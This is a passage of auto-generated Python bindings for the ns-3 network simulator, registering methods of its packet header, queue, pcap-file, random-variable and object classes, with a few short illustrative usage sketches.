## header.h (module 'network'): uint32_t ns3::Header::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## header.h (module 'network'): static ns3::TypeId ns3::Header::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## header.h (module 'network'): void ns3::Header::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## header.h (module 'network'): void ns3::Header::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3IntEmpiricalVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::IntEmpiricalVariable::IntEmpiricalVariable(ns3::IntEmpiricalVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::IntEmpiricalVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::IntEmpiricalVariable::IntEmpiricalVariable() [constructor]
cls.add_constructor([])
return
def register_Ns3LlcSnapHeader_methods(root_module, cls):
## llc-snap-header.h (module 'network'): ns3::LlcSnapHeader::LlcSnapHeader(ns3::LlcSnapHeader const & arg0) [copy constructor]
cls.add_constructor([param('ns3::LlcSnapHeader const &', 'arg0')])
## llc-snap-header.h (module 'network'): ns3::LlcSnapHeader::LlcSnapHeader() [constructor]
cls.add_constructor([])
## llc-snap-header.h (module 'network'): uint32_t ns3::LlcSnapHeader::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## llc-snap-header.h (module 'network'): ns3::TypeId ns3::LlcSnapHeader::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## llc-snap-header.h (module 'network'): uint32_t ns3::LlcSnapHeader::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## llc-snap-header.h (module 'network'): uint16_t ns3::LlcSnapHeader::GetType() [member function]
cls.add_method('GetType',
'uint16_t',
[])
## llc-snap-header.h (module 'network'): static ns3::TypeId ns3::LlcSnapHeader::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## llc-snap-header.h (module 'network'): void ns3::LlcSnapHeader::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## llc-snap-header.h (module 'network'): void ns3::LlcSnapHeader::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## llc-snap-header.h (module 'network'): void ns3::LlcSnapHeader::SetType(uint16_t type) [member function]
cls.add_method('SetType',
'void',
[param('uint16_t', 'type')])
return
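## Illustrative sketch (not part of the generated bindings): using the LlcSnapHeader
## registration above from Python. Assumes ns.network is importable and that the
## ns3::Packet bindings (registered elsewhere in this module) are available.
def _example_llc_snap_header_usage():
    import ns.network
    h = ns.network.LlcSnapHeader()
    h.SetType(0x0800)                     # EtherType for IPv4
    p = ns.network.Packet()               # Packet is registered elsewhere in this module
    p.AddHeader(h)                        # adds GetSerializedSize() bytes to the packet
    return p.GetSize()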
def register_Ns3LogNormalVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::LogNormalVariable::LogNormalVariable(ns3::LogNormalVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::LogNormalVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::LogNormalVariable::LogNormalVariable(double mu, double sigma) [constructor]
cls.add_constructor([param('double', 'mu'), param('double', 'sigma')])
return
def register_Ns3NormalVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::NormalVariable::NormalVariable(ns3::NormalVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NormalVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::NormalVariable::NormalVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::NormalVariable::NormalVariable(double m, double v) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 'v')])
## random-variable.h (module 'core'): ns3::NormalVariable::NormalVariable(double m, double v, double b) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 'v'), param('double', 'b')])
return
def register_Ns3Object_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::Object() [constructor]
cls.add_constructor([])
## object.h (module 'core'): void ns3::Object::AggregateObject(ns3::Ptr<ns3::Object> other) [member function]
cls.add_method('AggregateObject',
'void',
[param('ns3::Ptr< ns3::Object >', 'other')])
## object.h (module 'core'): void ns3::Object::Dispose() [member function]
cls.add_method('Dispose',
'void',
[])
## object.h (module 'core'): ns3::Object::AggregateIterator ns3::Object::GetAggregateIterator() const [member function]
cls.add_method('GetAggregateIterator',
'ns3::Object::AggregateIterator',
[],
is_const=True)
## object.h (module 'core'): ns3::TypeId ns3::Object::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## object.h (module 'core'): static ns3::TypeId ns3::Object::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object.h (module 'core'): void ns3::Object::Start() [member function]
cls.add_method('Start',
'void',
[])
## object.h (module 'core'): ns3::Object::Object(ns3::Object const & o) [copy constructor]
cls.add_constructor([param('ns3::Object const &', 'o')],
visibility='protected')
## object.h (module 'core'): void ns3::Object::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::DoStart() [member function]
cls.add_method('DoStart',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::NotifyNewAggregate() [member function]
cls.add_method('NotifyNewAggregate',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3ObjectAggregateIterator_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator(ns3::Object::AggregateIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Object::AggregateIterator const &', 'arg0')])
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator() [constructor]
cls.add_constructor([])
## object.h (module 'core'): bool ns3::Object::AggregateIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## object.h (module 'core'): ns3::Ptr<ns3::Object const> ns3::Object::AggregateIterator::Next() [member function]
cls.add_method('Next',
'ns3::Ptr< ns3::Object const >',
[])
return
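## Illustrative sketch (not part of the generated bindings): ns3::Object aggregation
## and the AggregateIterator registered above. Uses PacketBurst and RedQueue (both
## Object subclasses registered in this module) purely as convenient examples, and
## assumes direct construction from Python yields reference-counted Objects, as it
## does in typical ns-3 builds.
def _example_object_aggregation_usage():
    import ns.network
    obj = ns.network.PacketBurst()
    obj.AggregateObject(ns.network.RedQueue())
    it = obj.GetAggregateIterator()
    found = []
    while it.HasNext():                   # walk every object in the aggregate
        found.append(it.Next())
    return found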
def register_Ns3PacketBurst_methods(root_module, cls):
## packet-burst.h (module 'network'): ns3::PacketBurst::PacketBurst(ns3::PacketBurst const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketBurst const &', 'arg0')])
## packet-burst.h (module 'network'): ns3::PacketBurst::PacketBurst() [constructor]
cls.add_constructor([])
## packet-burst.h (module 'network'): void ns3::PacketBurst::AddPacket(ns3::Ptr<ns3::Packet> packet) [member function]
cls.add_method('AddPacket',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet')])
## packet-burst.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::Packet> > ns3::PacketBurst::Begin() const [member function]
cls.add_method('Begin',
'std::_List_const_iterator< ns3::Ptr< ns3::Packet > >',
[],
is_const=True)
## packet-burst.h (module 'network'): ns3::Ptr<ns3::PacketBurst> ns3::PacketBurst::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::PacketBurst >',
[],
is_const=True)
## packet-burst.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::Packet> > ns3::PacketBurst::End() const [member function]
cls.add_method('End',
'std::_List_const_iterator< ns3::Ptr< ns3::Packet > >',
[],
is_const=True)
## packet-burst.h (module 'network'): uint32_t ns3::PacketBurst::GetNPackets() const [member function]
cls.add_method('GetNPackets',
'uint32_t',
[],
is_const=True)
## packet-burst.h (module 'network'): std::list<ns3::Ptr<ns3::Packet>, std::allocator<ns3::Ptr<ns3::Packet> > > ns3::PacketBurst::GetPackets() const [member function]
cls.add_method('GetPackets',
'std::list< ns3::Ptr< ns3::Packet > >',
[],
is_const=True)
## packet-burst.h (module 'network'): uint32_t ns3::PacketBurst::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## packet-burst.h (module 'network'): static ns3::TypeId ns3::PacketBurst::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## packet-burst.h (module 'network'): void ns3::PacketBurst::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='private', is_virtual=True)
return
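## Illustrative sketch (not part of the generated bindings): grouping packets with
## the PacketBurst registration above. The Packet(uint32 size) constructor is
## registered elsewhere in this module; ns.network is assumed importable.
def _example_packet_burst_usage():
    import ns.network
    burst = ns.network.PacketBurst()
    burst.AddPacket(ns.network.Packet(100))
    burst.AddPacket(ns.network.Packet(200))
    return burst.GetNPackets(), burst.GetSize()   # expected: (2, 300)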
def register_Ns3ParetoVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(ns3::ParetoVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ParetoVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(double m) [constructor]
cls.add_constructor([param('double', 'm')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(double m, double s) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 's')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(double m, double s, double b) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 's'), param('double', 'b')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(std::pair<double,double> params) [constructor]
cls.add_constructor([param('std::pair< double, double >', 'params')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(std::pair<double,double> params, double b) [constructor]
cls.add_constructor([param('std::pair< double, double >', 'params'), param('double', 'b')])
return
def register_Ns3PcapFileWrapper_methods(root_module, cls):
## pcap-file-wrapper.h (module 'network'): static ns3::TypeId ns3::PcapFileWrapper::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## pcap-file-wrapper.h (module 'network'): ns3::PcapFileWrapper::PcapFileWrapper() [constructor]
cls.add_constructor([])
## pcap-file-wrapper.h (module 'network'): bool ns3::PcapFileWrapper::Fail() const [member function]
cls.add_method('Fail',
'bool',
[],
is_const=True)
## pcap-file-wrapper.h (module 'network'): bool ns3::PcapFileWrapper::Eof() const [member function]
cls.add_method('Eof',
'bool',
[],
is_const=True)
## pcap-file-wrapper.h (module 'network'): void ns3::PcapFileWrapper::Clear() [member function]
cls.add_method('Clear',
'void',
[])
## pcap-file-wrapper.h (module 'network'): void ns3::PcapFileWrapper::Open(std::string const & filename, std::_Ios_Openmode mode) [member function]
cls.add_method('Open',
'void',
[param('std::string const &', 'filename'), param('std::_Ios_Openmode', 'mode')])
## pcap-file-wrapper.h (module 'network'): void ns3::PcapFileWrapper::Close() [member function]
cls.add_method('Close',
'void',
[])
## pcap-file-wrapper.h (module 'network'): void ns3::PcapFileWrapper::Init(uint32_t dataLinkType, uint32_t snapLen=std::numeric_limits<unsigned int>::max(), int32_t tzCorrection=ns3::PcapFile::ZONE_DEFAULT) [member function]
cls.add_method('Init',
'void',
[param('uint32_t', 'dataLinkType'), param('uint32_t', 'snapLen', default_value='std::numeric_limits<unsigned int>::max()'), param('int32_t', 'tzCorrection', default_value='ns3::PcapFile::ZONE_DEFAULT')])
## pcap-file-wrapper.h (module 'network'): void ns3::PcapFileWrapper::Write(ns3::Time t, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('Write',
'void',
[param('ns3::Time', 't'), param('ns3::Ptr< ns3::Packet const >', 'p')])
## pcap-file-wrapper.h (module 'network'): void ns3::PcapFileWrapper::Write(ns3::Time t, ns3::Header & header, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('Write',
'void',
[param('ns3::Time', 't'), param('ns3::Header &', 'header'), param('ns3::Ptr< ns3::Packet const >', 'p')])
## pcap-file-wrapper.h (module 'network'): void ns3::PcapFileWrapper::Write(ns3::Time t, uint8_t const * buffer, uint32_t length) [member function]
cls.add_method('Write',
'void',
[param('ns3::Time', 't'), param('uint8_t const *', 'buffer'), param('uint32_t', 'length')])
## pcap-file-wrapper.h (module 'network'): uint32_t ns3::PcapFileWrapper::GetMagic() [member function]
cls.add_method('GetMagic',
'uint32_t',
[])
## pcap-file-wrapper.h (module 'network'): uint16_t ns3::PcapFileWrapper::GetVersionMajor() [member function]
cls.add_method('GetVersionMajor',
'uint16_t',
[])
## pcap-file-wrapper.h (module 'network'): uint16_t ns3::PcapFileWrapper::GetVersionMinor() [member function]
cls.add_method('GetVersionMinor',
'uint16_t',
[])
## pcap-file-wrapper.h (module 'network'): int32_t ns3::PcapFileWrapper::GetTimeZoneOffset() [member function]
cls.add_method('GetTimeZoneOffset',
'int32_t',
[])
## pcap-file-wrapper.h (module 'network'): uint32_t ns3::PcapFileWrapper::GetSigFigs() [member function]
cls.add_method('GetSigFigs',
'uint32_t',
[])
## pcap-file-wrapper.h (module 'network'): uint32_t ns3::PcapFileWrapper::GetSnapLen() [member function]
cls.add_method('GetSnapLen',
'uint32_t',
[])
## pcap-file-wrapper.h (module 'network'): uint32_t ns3::PcapFileWrapper::GetDataLinkType() [member function]
cls.add_method('GetDataLinkType',
'uint32_t',
[])
return
def register_Ns3Queue_methods(root_module, cls):
## queue.h (module 'network'): ns3::Queue::Queue(ns3::Queue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Queue const &', 'arg0')])
## queue.h (module 'network'): ns3::Queue::Queue() [constructor]
cls.add_constructor([])
## queue.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Queue::Dequeue() [member function]
cls.add_method('Dequeue',
'ns3::Ptr< ns3::Packet >',
[])
## queue.h (module 'network'): void ns3::Queue::DequeueAll() [member function]
cls.add_method('DequeueAll',
'void',
[])
## queue.h (module 'network'): bool ns3::Queue::Enqueue(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('Enqueue',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')])
## queue.h (module 'network'): uint32_t ns3::Queue::GetNBytes() const [member function]
cls.add_method('GetNBytes',
'uint32_t',
[],
is_const=True)
## queue.h (module 'network'): uint32_t ns3::Queue::GetNPackets() const [member function]
cls.add_method('GetNPackets',
'uint32_t',
[],
is_const=True)
## queue.h (module 'network'): uint32_t ns3::Queue::GetTotalDroppedBytes() const [member function]
cls.add_method('GetTotalDroppedBytes',
'uint32_t',
[],
is_const=True)
## queue.h (module 'network'): uint32_t ns3::Queue::GetTotalDroppedPackets() const [member function]
cls.add_method('GetTotalDroppedPackets',
'uint32_t',
[],
is_const=True)
## queue.h (module 'network'): uint32_t ns3::Queue::GetTotalReceivedBytes() const [member function]
cls.add_method('GetTotalReceivedBytes',
'uint32_t',
[],
is_const=True)
## queue.h (module 'network'): uint32_t ns3::Queue::GetTotalReceivedPackets() const [member function]
cls.add_method('GetTotalReceivedPackets',
'uint32_t',
[],
is_const=True)
## queue.h (module 'network'): static ns3::TypeId ns3::Queue::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## queue.h (module 'network'): bool ns3::Queue::IsEmpty() const [member function]
cls.add_method('IsEmpty',
'bool',
[],
is_const=True)
## queue.h (module 'network'): ns3::Ptr<const ns3::Packet> ns3::Queue::Peek() const [member function]
cls.add_method('Peek',
'ns3::Ptr< ns3::Packet const >',
[],
is_const=True)
## queue.h (module 'network'): void ns3::Queue::ResetStatistics() [member function]
cls.add_method('ResetStatistics',
'void',
[])
## queue.h (module 'network'): void ns3::Queue::Drop(ns3::Ptr<ns3::Packet> packet) [member function]
cls.add_method('Drop',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet')],
visibility='protected')
## queue.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Queue::DoDequeue() [member function]
cls.add_method('DoDequeue',
'ns3::Ptr< ns3::Packet >',
[],
is_pure_virtual=True, visibility='private', is_virtual=True)
## queue.h (module 'network'): bool ns3::Queue::DoEnqueue(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('DoEnqueue',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')],
is_pure_virtual=True, visibility='private', is_virtual=True)
## queue.h (module 'network'): ns3::Ptr<const ns3::Packet> ns3::Queue::DoPeek() const [member function]
cls.add_method('DoPeek',
'ns3::Ptr< ns3::Packet const >',
[],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3RadiotapHeader_methods(root_module, cls):
## radiotap-header.h (module 'network'): ns3::RadiotapHeader::RadiotapHeader(ns3::RadiotapHeader const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RadiotapHeader const &', 'arg0')])
## radiotap-header.h (module 'network'): ns3::RadiotapHeader::RadiotapHeader() [constructor]
cls.add_constructor([])
## radiotap-header.h (module 'network'): uint32_t ns3::RadiotapHeader::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## radiotap-header.h (module 'network'): uint8_t ns3::RadiotapHeader::GetAntennaNoisePower() const [member function]
cls.add_method('GetAntennaNoisePower',
'uint8_t',
[],
is_const=True)
## radiotap-header.h (module 'network'): uint8_t ns3::RadiotapHeader::GetAntennaSignalPower() const [member function]
cls.add_method('GetAntennaSignalPower',
'uint8_t',
[],
is_const=True)
## radiotap-header.h (module 'network'): uint16_t ns3::RadiotapHeader::GetChannelFlags() const [member function]
cls.add_method('GetChannelFlags',
'uint16_t',
[],
is_const=True)
## radiotap-header.h (module 'network'): uint16_t ns3::RadiotapHeader::GetChannelFrequency() const [member function]
cls.add_method('GetChannelFrequency',
'uint16_t',
[],
is_const=True)
## radiotap-header.h (module 'network'): uint8_t ns3::RadiotapHeader::GetFrameFlags() const [member function]
cls.add_method('GetFrameFlags',
'uint8_t',
[],
is_const=True)
## radiotap-header.h (module 'network'): ns3::TypeId ns3::RadiotapHeader::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## radiotap-header.h (module 'network'): uint8_t ns3::RadiotapHeader::GetRate() const [member function]
cls.add_method('GetRate',
'uint8_t',
[],
is_const=True)
## radiotap-header.h (module 'network'): uint32_t ns3::RadiotapHeader::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## radiotap-header.h (module 'network'): uint64_t ns3::RadiotapHeader::GetTsft() const [member function]
cls.add_method('GetTsft',
'uint64_t',
[],
is_const=True)
## radiotap-header.h (module 'network'): static ns3::TypeId ns3::RadiotapHeader::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## radiotap-header.h (module 'network'): void ns3::RadiotapHeader::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## radiotap-header.h (module 'network'): void ns3::RadiotapHeader::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## radiotap-header.h (module 'network'): void ns3::RadiotapHeader::SetAntennaNoisePower(double noise) [member function]
cls.add_method('SetAntennaNoisePower',
'void',
[param('double', 'noise')])
## radiotap-header.h (module 'network'): void ns3::RadiotapHeader::SetAntennaSignalPower(double signal) [member function]
cls.add_method('SetAntennaSignalPower',
'void',
[param('double', 'signal')])
## radiotap-header.h (module 'network'): void ns3::RadiotapHeader::SetChannelFrequencyAndFlags(uint16_t frequency, uint16_t flags) [member function]
cls.add_method('SetChannelFrequencyAndFlags',
'void',
[param('uint16_t', 'frequency'), param('uint16_t', 'flags')])
## radiotap-header.h (module 'network'): void ns3::RadiotapHeader::SetFrameFlags(uint8_t flags) [member function]
cls.add_method('SetFrameFlags',
'void',
[param('uint8_t', 'flags')])
## radiotap-header.h (module 'network'): void ns3::RadiotapHeader::SetRate(uint8_t rate) [member function]
cls.add_method('SetRate',
'void',
[param('uint8_t', 'rate')])
## radiotap-header.h (module 'network'): void ns3::RadiotapHeader::SetTsft(uint64_t tsft) [member function]
cls.add_method('SetTsft',
'void',
[param('uint64_t', 'tsft')])
return
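## Illustrative sketch (not part of the generated bindings): filling in a
## RadiotapHeader via the setters registered above. The numeric flag values are
## illustrative only; consult radiotap-header.h for the defined bit masks.
def _example_radiotap_header_usage():
    import ns.network
    rt = ns.network.RadiotapHeader()
    rt.SetTsft(123456)                            # TSFT timestamp
    rt.SetRate(11)                                # 5.5 Mb/s, in units of 500 kb/s
    rt.SetFrameFlags(0x10)                        # illustrative flag bits
    rt.SetChannelFrequencyAndFlags(2437, 0x00a0)  # channel 6, illustrative flags
    return rt.GetSerializedSize()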
def register_Ns3RedQueue_methods(root_module, cls):
## red-queue.h (module 'network'): ns3::RedQueue::RedQueue(ns3::RedQueue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RedQueue const &', 'arg0')])
## red-queue.h (module 'network'): ns3::RedQueue::RedQueue() [constructor]
cls.add_constructor([])
## red-queue.h (module 'network'): ns3::Queue::QueueMode ns3::RedQueue::GetMode() [member function]
cls.add_method('GetMode',
'ns3::Queue::QueueMode',
[])
## red-queue.h (module 'network'): uint32_t ns3::RedQueue::GetQueueSize() [member function]
cls.add_method('GetQueueSize',
'uint32_t',
[])
## red-queue.h (module 'network'): ns3::RedQueue::Stats ns3::RedQueue::GetStats() [member function]
cls.add_method('GetStats',
'ns3::RedQueue::Stats',
[])
## red-queue.h (module 'network'): static ns3::TypeId ns3::RedQueue::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## red-queue.h (module 'network'): void ns3::RedQueue::SetMode(ns3::Queue::QueueMode mode) [member function]
cls.add_method('SetMode',
'void',
[param('ns3::Queue::QueueMode', 'mode')])
## red-queue.h (module 'network'): void ns3::RedQueue::SetQueueLimit(uint32_t lim) [member function]
cls.add_method('SetQueueLimit',
'void',
[param('uint32_t', 'lim')])
## red-queue.h (module 'network'): void ns3::RedQueue::SetTh(double minTh, double maxTh) [member function]
cls.add_method('SetTh',
'void',
[param('double', 'minTh'), param('double', 'maxTh')])
## red-queue.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::RedQueue::DoDequeue() [member function]
cls.add_method('DoDequeue',
'ns3::Ptr< ns3::Packet >',
[],
visibility='private', is_virtual=True)
## red-queue.h (module 'network'): bool ns3::RedQueue::DoEnqueue(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('DoEnqueue',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'p')],
visibility='private', is_virtual=True)
## red-queue.h (module 'network'): ns3::Ptr<const ns3::Packet> ns3::RedQueue::DoPeek() const [member function]
cls.add_method('DoPeek',
'ns3::Ptr< ns3::Packet const >',
[],
is_const=True, visibility='private', is_virtual=True)
return
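## Illustrative sketch (not part of the generated bindings): configuring a RedQueue
## through the setters above and reading its Stats (registered just below). Real
## simulations normally create queues via ObjectFactory/attributes; direct
## construction here is only to show the bound API, and assumes default attribute
## values are sufficient for Enqueue/Dequeue to work.
def _example_red_queue_usage():
    import ns.network
    q = ns.network.RedQueue()
    q.SetQueueLimit(25)
    q.SetTh(5.0, 15.0)                    # min/max average-queue-size thresholds
    q.Enqueue(ns.network.Packet(512))     # Enqueue/Dequeue come from the ns3::Queue base
    q.Dequeue()
    stats = q.GetStats()
    return stats.unforcedDrop + stats.forcedDrop + stats.qLimDrop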
def register_Ns3RedQueueStats_methods(root_module, cls):
## red-queue.h (module 'network'): ns3::RedQueue::Stats::Stats() [constructor]
cls.add_constructor([])
## red-queue.h (module 'network'): ns3::RedQueue::Stats::Stats(ns3::RedQueue::Stats const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RedQueue::Stats const &', 'arg0')])
## red-queue.h (module 'network'): ns3::RedQueue::Stats::forcedDrop [variable]
cls.add_instance_attribute('forcedDrop', 'uint32_t', is_const=False)
## red-queue.h (module 'network'): ns3::RedQueue::Stats::qLimDrop [variable]
cls.add_instance_attribute('qLimDrop', 'uint32_t', is_const=False)
## red-queue.h (module 'network'): ns3::RedQueue::Stats::unforcedDrop [variable]
cls.add_instance_attribute('unforcedDrop', 'uint32_t', is_const=False)
return
def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, cls):
